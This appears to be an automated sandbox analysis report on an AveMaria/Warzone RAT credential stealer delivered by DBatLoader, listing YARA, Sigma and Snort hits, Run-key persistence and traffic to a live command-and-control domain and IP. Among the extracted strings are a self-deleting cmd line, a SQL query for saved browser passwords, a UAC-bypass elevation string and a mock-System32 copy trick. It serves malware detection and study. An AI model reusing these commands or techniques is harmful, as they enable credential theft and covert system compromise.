14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a58:$a1: \Opera Software\Opera Stable\Login Data 0x2d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2608:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack	AveMaria_WarZone	unknown	unknown	0x4ba8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x49ac:$str2: MsgBox.exe 0x4c14:$str4: \System32\cmd.exe 0x4880:$str6: Ave_Maria 0x40e0:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x338c:$str8: SMTP Password 0x2608:$str11: \Google\Chrome\User Data\Default\Login Data 0x40ac:$str12: \sqlmap.dll
14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x4c55:$r1: Classes\Folder\shell\open\command 0x4c78:$k1: DelegateExecute
14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x4dd0:$pwsh: powershell 0x1f63:$s2: User-Agent: 0x215c:$s4: LdrLoadDll 0x19e4:$v6: start
29.2.dbkyovyK.pif.400000.1.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
29.2.dbkyovyK.pif.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.2.dbkyovyK.pif.400000.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.2.dbkyovyK.pif.400000.1.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ac80:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19464:$a2: SMTP Password 0x18518:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1d9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1abd0:$a5: for /F "usebackq tokens=*" %%A in (" 0x18ef0:$a6: \Torch\User Data\Default\Login Data 0x1db10:$a7: /n:%temp%\ellocnak.xml 0x19a50:$a8: "os_crypt":{"encrypted_key":" 0x1db40:$a9: Hey I'm Admin 0x1932c:$a10: \logins.json 0x199c8:$a11: Accounts\Account.rec0 0x1a958:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.2.dbkyovyK.pif.400000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18b30:$a1: \Opera Software\Opera Stable\Login Data 0x18e58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x186e0:$a3: \Google\Chrome\User Data\Default\Login Data
29.2.dbkyovyK.pif.400000.1.unpack	AveMaria_WarZone	unknown	unknown	0x1ac80:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1aa84:$str2: MsgBox.exe 0x1acec:$str4: \System32\cmd.exe 0x1a958:$str6: Ave_Maria 0x1a1b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19464:$str8: SMTP Password 0x186e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1a184:$str12: \sqlmap.dll 0x1d9f0:$str16: Elevation:Administrator!new 0x1db10:$str17: /n:%temp%
29.2.dbkyovyK.pif.400000.1.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
29.2.dbkyovyK.pif.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1ad2d:$r1: Classes\Folder\shell\open\command 0x1ad50:$k1: DelegateExecute
29.2.dbkyovyK.pif.400000.1.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1a774:$s1: RDPClip 0x1ae4c:$s2: Grabber 0x1a958:$s3: Ave_Maria Stealer OpenSource 0x1aa58:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1db10:$s6: /n:%temp%\ellocnak.xml 0x1db40:$s7: Hey I'm Admin
29.2.dbkyovyK.pif.400000.1.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1aea8:$pwsh: powershell 0x1803b:$s2: User-Agent: 0x18234:$s4: LdrLoadDll 0x17abc:$v6: start
8.0.pointer.com.400000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
8.2.pointer.com.2d10000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 169 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\pointer.com , CommandLine: C:\Users\Public\pointer.com , CommandLine|base64offset|contains: , Image: C:\Users\Public\pointer.com, NewProcessName: C:\Users\Public\pointer.com, OriginalFileName: C:\Users\Public\pointer.com, ParentCommandLine: cmd /c start C:\Users\Public\pointer.com , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2004, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\pointer.com , ProcessId: 2596, ProcessName: pointer.com

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Kyvoykbd.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\pointer.com, ProcessId: 2596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kyvoykbd

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\pointer.com , ParentImage: C:\Users\Public\pointer.com, ParentProcessId: 2596, ParentProcessName: pointer.com, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" ", ProcessId: 3664, ProcessName: cmd.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 13.107.139.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\pointer.com, Initiated: true, ProcessId: 2596, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49729

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 3756, TargetFilename: C:\Users\Public\pointer.com

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Kyvoykbd.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\pointer.com, ProcessId: 2596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kyvoykbd

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\dbkyovyK.pif, CommandLine: C:\Users\Public\Libraries\dbkyovyK.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\dbkyovyK.pif, NewProcessName: C:\Users\Public\Libraries\dbkyovyK.pif, OriginalFileName: C:\Users\Public\Libraries\dbkyovyK.pif, ParentCommandLine: C:\Users\Public\pointer.com , ParentImage: C:\Users\Public\pointer.com, ParentProcessId: 2596, ParentProcessName: pointer.com, ProcessCommandLine: C:\Users\Public\Libraries\dbkyovyK.pif, ProcessId: 6644, ProcessName: dbkyovyK.pif

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y , CommandLine: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y , CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y , ProcessId: 6836, ProcessName: xcopy.exe

Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Users\Public\pointer.com , CommandLine: C:\Users\Public\pointer.com , CommandLine|base64offset|contains: , Image: C:\Users\Public\pointer.com, NewProcessName: C:\Users\Public\pointer.com, OriginalFileName: C:\Users\Public\pointer.com, ParentCommandLine: cmd /c start C:\Users\Public\pointer.com , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2004, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\pointer.com , ProcessId: 2596, ProcessName: pointer.com

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 10, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\dbkyovyK.pif, ProcessId: 6644, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server

Snort Signatures

ETPRO TROJAN Ave Maria/Warzone RAT PingCommand - Source IP: 91.92.254.111 - Destination IP: 192.168.2.4

Timestamp:	91.92.254.111192.168.2.41977497322851945 02/06/24-08:49:47.932264
SID:	2851945
Source Port:	1977
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingResponse - Source IP: 192.168.2.4 - Destination IP: 91.92.254.111

Timestamp:	192.168.2.491.92.254.1114973219772851946 02/06/24-08:49:47.932715
SID:	2851946
Source Port:	49732
Destination Port:	1977
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse - Source IP: 192.168.2.4 - Destination IP: 91.92.254.111

Timestamp:	192.168.2.491.92.254.1114973219772852357 02/06/24-08:48:08.135804
SID:	2852357
Source Port:	49732
Destination Port:	1977
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) - Source IP: 91.92.254.111 - Destination IP: 192.168.2.4

Timestamp:	91.92.254.111192.168.2.41977497322851895 02/06/24-08:48:07.935224
SID:	2851895
Source Port:	1977
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket - Source IP: 91.92.254.111 - Destination IP: 192.168.2.4

Timestamp:	91.92.254.111192.168.2.41977497322852356 02/06/24-08:50:07.934374
SID:	2852356
Source Port:	1977
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Warzone RAT Response (Inbound) - Source IP: 91.92.254.111 - Destination IP: 192.168.2.4

Timestamp:	91.92.254.111192.168.2.41977497322038897 02/06/24-08:48:07.935224
SID:	2038897
Source Port:	1977
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: burger042.ddnsfree.com

Avira URL Cloud: Label: phishing

Found malware configuration

Source: 8.2.pointer.com.126450d8.10.raw.unpack

Malware Configuration Extractor: AveMaria {"C2 url": "burger042.ddnsfree.com", "port": 1977, "Proxy Port": 0}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 34%
Source: C:\Users\Public\Libraries\netutils.dll	Virustotal: Detection: 43%			Perma Link

Yara detected AveMaria stealer

Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\Public\pointer.com	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\netutils.dll	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Joe Sandbox ML: detected

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_004108A6 LocalAlloc,BCryptDecrypt,EntryPoint,EntryPoint,LocalFree,	14_2_004108A6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040DA6A lstrlenA,CryptStringToBinaryA,lstrcpyA,	14_2_0040DA6A
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_00410468 CryptUnprotectData,LocalAlloc,LocalFree,	14_2_00410468
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040CC6B RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,	14_2_0040CC6B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_004105C0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	14_2_004105C0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_00410620 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,	14_2_00410620
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_004108A6 LocalAlloc,BCryptDecrypt,EntryPoint,EntryPoint,LocalFree,	25_1_004108A6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040DA6A lstrlenA,CryptStringToBinaryA,lstrcpyA,	25_1_0040DA6A
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_00410468 CryptUnprotectData,LocalAlloc,LocalFree,	25_1_00410468
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040CC6B RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,	25_1_0040CC6B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_004105C0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	25_1_004105C0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_00410620 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,	25_1_00410620

Exploits

Yara detected UACMe UAC Bypass tool

Source: Yara match	File source: 8.2.pointer.com.12661d48.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123c4b88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123e5bb8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1918637421.0000000000554000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.1696850208.0000000000554000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1834966037.0000000000554000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1696692635.000000007EEF4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000001.1902763804.0000000000554000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pointer.com PID: 2596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dbkyovyK.pif PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kyvoykbd.PIF PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dbkyovyK.pif PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dbkyovyK.pif PID: 7688, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Unpacked PE file: 14.2.dbkyovyK.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Unpacked PE file: 29.2.dbkyovyK.pif.400000.1.unpack

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49743 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr
Source:	Binary string: easinvoker.pdb source: pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, easinvoker.exe.8.dr
Source:	Binary string: easinvoker.pdbH source: pointer.com, 00000008.00000003.1692645825.0000000012431000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, easinvoker.exe.8.dr
Source:	Binary string: wuser32.pdb source: dbkyovyK.pif, dbkyovyK.pif, 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2906644486.00000000374A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdbUGP source: dbkyovyK.pif, 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2906644486.00000000374A3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_39CDBBA0 UnregisterDeviceNotification,

14_2_39CDBBA0

Source: C:\Users\Public\pointer.com	Code function: 8_2_02D15C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	8_2_02D15C18
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,	14_2_0040C293
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW,	14_2_00413C83
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,	25_1_0040C293
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW,	25_1_00413C83

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00413DA4 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,lstrlenW,lstrcpyW,lstrlenW,

14_2_00413DA4

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2038897 ET TROJAN Warzone RAT Response (Inbound) 91.92.254.111:1977 -> 192.168.2.4:49732
Source: Traffic	Snort IDS: 2852356 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 91.92.254.111:1977 -> 192.168.2.4:49732
Source: Traffic	Snort IDS: 2851895 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 91.92.254.111:1977 -> 192.168.2.4:49732
Source: Traffic	Snort IDS: 2852357 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.4:49732 -> 91.92.254.111:1977
Source: Traffic	Snort IDS: 2851945 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 91.92.254.111:1977 -> 192.168.2.4:49732
Source: Traffic	Snort IDS: 2851946 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.4:49732 -> 91.92.254.111:1977

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: burger042.ddnsfree.com

Contains functionality to check if Internet connection is working

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040820B getaddrinfo,socket,htons,freeaddrinfo,WSAConnect,send,EntryPoint,recv,closesocket, microsoft.com		14_2_0040820B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040820B getaddrinfo,socket,htons,freeaddrinfo,WSAConnect,send,EntryPoint,recv,closesocket, microsoft.com		25_1_0040820B

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D6BAE4 InternetCheckConnectionA,

8_2_02D6BAE4

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_004036EA URLDownloadToFileW,ShellExecuteW,

14_2_004036EA

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 91.92.254.111:1977

Source: Joe Sandbox View

IP Address: 13.107.139.11 13.107.139.11

